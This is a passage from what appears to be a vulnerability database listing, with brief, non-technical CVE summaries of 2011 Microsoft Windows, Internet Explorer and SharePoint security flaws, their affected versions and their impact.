SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-3402] Unspecified vulnerability in the TrueType font parsing engine in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted font data in a Word document or web page, as exploited in the wild in November 2011 by Duqu, aka "TrueType Font Parsing Vulnerability." [CVE-2011-3401] ENCDEC.DLL in Windows Media Player and Media Center in Microsoft Windows XP SP2 and SP3, Windows Vista SP2, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .dvr-ms file, aka "Windows Media Player DVR-MS Memory Corruption Vulnerability." [CVE-2011-3400] Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 do not properly handle OLE objects in memory, which allows remote attackers to execute arbitrary code via a crafted object in a file, aka "OLE Property Vulnerability." [CVE-2011-3397] The Microsoft Time component in DATIME.DLL in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted web site that leverages an unspecified "binary behavior" in Internet Explorer, aka "Microsoft Time Remote Code Execution Vulnerability." [CVE-2011-3389] The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. [CVE-2011-2019] Untrusted search path vulnerability in Microsoft Internet Explorer 9 on Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an HTML file, aka "Internet Explorer Insecure Library Loading Vulnerability." [CVE-2011-2018] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 does not properly initialize objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2011-2016] Untrusted search path vulnerability in Windows Mail and Windows Meeting Space in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .eml or .wcinv file, aka "Windows Mail Insecure Library Loading Vulnerability." [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2011-2013] Integer overflow in the TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code by sending a sequence of crafted UDP packets to a closed port, aka "Reference Counter Overflow Vulnerability." [CVE-2011-2011] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-2009] Untrusted search path vulnerability in Windows Media Center in Microsoft Windows Vista SP2 and Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista, allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Media Center Insecure Library Loading Vulnerability." [CVE-2011-2005] afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-2004] Array index error in win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a crafted TrueType font file, aka "TrueType Font Parsing Vulnerability," a different vulnerability than CVE-2011-3402. [CVE-2011-2003] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted .fon file, aka "Font Library File Buffer Overrun Vulnerability." [CVE-2011-2002] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle TrueType fonts, which allows local users to cause a denial of service (system hang) via a crafted font file, aka "Win32k TrueType Font Type Translation Vulnerability." [CVE-2011-1991] Multiple untrusted search path vulnerabilities in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .rtf, or .txt file, related to (1) deskpan.dll in the Display Panning CPL Extension, (2) EAPHost Authenticator Service, (3) Folder Redirection, (4) HyperTerminal, (5) the Japanese Input Method Editor (IME), and (6) Microsoft Management Console (MMC), aka "Windows Components Insecure Library Loading Vulnerability." [CVE-2011-1985] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1984] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges by sending crafted packets over the loopback interface, aka "WINS Local Elevation of Privilege Vulnerability." [CVE-2011-1975] Untrusted search path vulnerability in the Data Access Tracing component in Windows Data Access Components (Windows DAC) 6.0 in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an Excel .xlsx file, aka "Data Access Components Insecure Library Loading Vulnerability." [CVE-2011-1974] NDISTAPI.sys in the NDISTAPI driver in Remote Access Service (RAS) in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "NDISTAPI Elevation of Privilege Vulnerability." [CVE-2011-1971] The kernel in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse file metadata, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Metadata Parsing DOS Vulnerability." [CVE-2011-1970] The DNS server in Microsoft Windows Server 2003 SP2 and Windows Server 2008 SP2, R2, and R2 SP1 does not properly initialize memory, which allows remote attackers to cause a denial of service (service outage) via a query for a nonexistent domain, aka "DNS Uninitialized Memory Corruption Vulnerability." [CVE-2011-1968] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP2 does not properly process packets in memory, which allows remote attackers to cause a denial of service (reboot) by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, as exploited in the wild in 2011, aka "Remote Desktop Protocol Vulnerability." [CVE-2011-1967] Winsrv.dll in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly check permissions for sending inter-process device-event messages from low-integrity processes to high-integrity processes, which allows local users to gain privileges via a crafted application, aka "CSRSS Vulnerability." [CVE-2011-1966] The DNS server in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 does not properly handle NAPTR queries that trigger recursive processing, which allows remote attackers to execute arbitrary code via a crafted query, aka "DNS NAPTR Query Vulnerability." [CVE-2011-1965] Tcpip.sys in the TCP/IP stack in Microsoft Windows 7 Gold and SP1 and Windows Server 2008 R2 and R2 SP1 does not properly implement URL-based QoS, which allows remote attackers to cause a denial of service (reboot) via a crafted URL to a web server, aka "TCP/IP QOS Denial of Service Vulnerability." [CVE-2011-1894] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for embedded content in an HTML document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted EMBED element in a web page that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-1893] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010, Windows SharePoint Services 2.0 and 3.0 SP2, and SharePoint Foundation 2010 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "SharePoint XSS Vulnerability." [CVE-2011-1892] Microsoft Office Groove 2007 SP2, SharePoint Workspace 2010 Gold and SP1, Office Forms Server 2007 SP2, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Office Groove Data Bridge Server 2007 SP2, Office Groove Management Server 2007 SP2, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, and Office Web Apps 2010 Gold and SP1 do not properly handle Web Parts containing XML classes referencing external entities, which allows remote authenticated users to read arbitrary files via a crafted XML and XSL file, aka "SharePoint Remote File Disclosure Vulnerability." [CVE-2011-1891] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters in a request to a script, aka "Contact Details Reflected XSS Vulnerability." [CVE-2011-1888] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1887] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1886] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 does not properly validate the arguments to functions, which allows local users to read arbitrary data from kernel memory via a crafted application that triggers a NULL pointer dereference, aka "Win32k Incorrect Parameter Validation Allows Information Disclosure Vulnerability." [CVE-2011-1885] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1884] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1883] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1882] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1881] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1880] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1879] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1878] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1877] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability." [CVE-2011-1876] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1875] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1874] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other CVEs listed in MS11-054, aka "Win32k Use After Free Vulnerability." [CVE-2011-1873] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 on 64-bit platforms does not properly validate pointers during the parsing of OpenType (aka OTF) fonts, which allows remote attackers to execute arbitrary code via a crafted font file, aka "Win32k OTF Validation Vulnerability." [CVE-2011-1872] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, R2, and R2 SP1 allows guest OS users to cause a denial of service (host OS infinite loop) via malformed machine instructions in a VMBus packet, aka "VMBus Persistent DoS Vulnerability." [CVE-2011-1871] Tcpip.sys in the TCP/IP stack in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (reboot) via a series of crafted ICMP messages, aka "ICMP Denial of Service Vulnerability." [CVE-2011-1870] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutputString Vulnerability." [CVE-2011-1869] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote DFS servers to cause a denial of service (system hang) via a crafted referral response, aka "DFS Referral Response Vulnerability." [CVE-2011-1868] The Distributed File System (DFS) implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly validate fields in DFS responses, which allows remote DFS servers to execute arbitrary code via a crafted response, aka "DFS Memory Corruption Vulnerability." [CVE-2011-1713] Microsoft msxml.dll, as used in Internet Explorer 8 on Windows 7, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function. NOTE: this might overlap CVE-2011-1202. [CVE-2011-1652] DISPUTED The default configuration of Microsoft Windows 7 immediately prefers a new IPv6 and DHCPv6 service over a currently used IPv4 and DHCPv4 service upon receipt of an IPv6 Router Advertisement (RA), and does not provide an option to ignore an unexpected RA, which allows remote attackers to conduct man-in-the-middle attacks on communication with external IPv4 servers via vectors involving RAs, a DHCPv6 server, and NAT-PT on the local network, aka a "SLAAC Attack." NOTE: it can be argued that preferring IPv6 complies with RFC 3484, and that attempting to determine the legitimacy of an RA is currently outside the scope of recommended behavior of host operating systems. [CVE-2011-1347] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to bypass Protected Mode and create arbitrary files by leveraging access to a Low integrity process, as demonstrated by Stephen Fewer as the third of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1346] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011. [CVE-2011-1284] Integer overflow in the Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvWriteConsoleOutput Vulnerability." [CVE-2011-1283] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 does not ensure that an unspecified array index has a non-negative value before performing read and write operations, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleNumberOfCommand Vulnerability." [CVE-2011-1282] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly initialize memory and consequently uses a NULL pointer in an unspecified function call, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP SrvSetConsoleLocalEUDC Vulnerability." [CVE-2011-1281] The Client/Server Run-time Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly restrict the number of console objects for a process, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP AllocConsole Vulnerability." [CVE-2011-1268] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Response Parsing Vulnerability." [CVE-2011-1267] The SMB server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 request, aka "SMB Request Parsing Vulnerability." [CVE-2011-1265] The Bluetooth Stack 2.1 in Microsoft Windows Vista SP1 and SP2 and Windows 7 Gold and SP1 does not prevent access to objects in memory that (1) were not properly initialized or (2) have been deleted, which allows remote attackers to execute arbitrary code via crafted Bluetooth packets, aka "Bluetooth Stack Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1249] The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-1248] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 does not properly handle socket send exceptions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets, related to unintended stack-frame values and buffer passing, aka "WINS Service Failed Response Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-1243] The Windows Messenger ActiveX control in msgsc.dll in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via unspecified vectors that "corrupt the system state," aka "Microsoft Windows Messenger ActiveX Control Vulnerability." [CVE-2011-1242] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1241] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1240] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1239] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1238] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1237] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1236] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1235] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1234] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1233] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1232] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1231] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1230] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1229] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other 